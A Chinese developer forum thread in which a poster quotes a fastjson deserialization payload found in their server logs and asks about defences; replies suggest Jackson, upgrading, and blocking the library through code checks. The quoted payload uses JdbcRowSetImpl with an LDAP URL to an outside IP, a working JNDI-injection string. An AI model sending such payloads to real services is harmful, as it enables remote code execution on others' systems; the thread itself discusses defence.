日志中查到有人发送异常参数至接口
{"x":{{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://9.4.131.68:1389/fastjsonfc5fd1bcac3b753a7d4fa9dab78d162e","autoCommit":true}}
查了下可能是 fastjson 反序列化攻击,目前项目使用的 fastjson 版本是 1.2.73 ,好像不在攻击范围内,请问下还有其他防御措施吗
1
Jooooooooo 2022-05-06 16:59:28 +08:00
换 jackson
|
2
moe3000 OP @Jooooooooo 下个、下个版本一定
|
3
BBCCBB 2022-05-06 17:02:58 +08:00
|
4
bthulu 2022-05-06 17:06:39 +08:00 2
不在攻击范围内, 有空就升级到最新版, 没空就不管它. jackson 一样有这样的问题.
|
5
clf 2022-05-06 17:10:19 +08:00 3
公司的代码规范检查插件里。就直接代码检查 com.alibaba 的包。有用到的禁止提交代码。gitlab 的 hooks 也是加了检查。
|
7
clf 2022-05-06 17:54:00 +08:00
@RainCats #6 也用的,但只用开源基金会支持的,阿里已经捐给 apache 的都是 apache 的包名。主要是不用 fastjson
|
10
banmuyutian 2022-05-07 10:37:10 +08:00
@clf #5
我现在还用的阿里项目仅剩下 easyexcel |
12
clf 2022-05-07 14:46:09 +08:00
@banmuyutian 我们是直接用的 POI ,和基础服务的数据结构(比如表单等)封装了接口。
|
13
xiaopigfly 2022-05-07 14:53:52 +08:00
问题不大,只要放到公网就会有人扫描。正常的。
|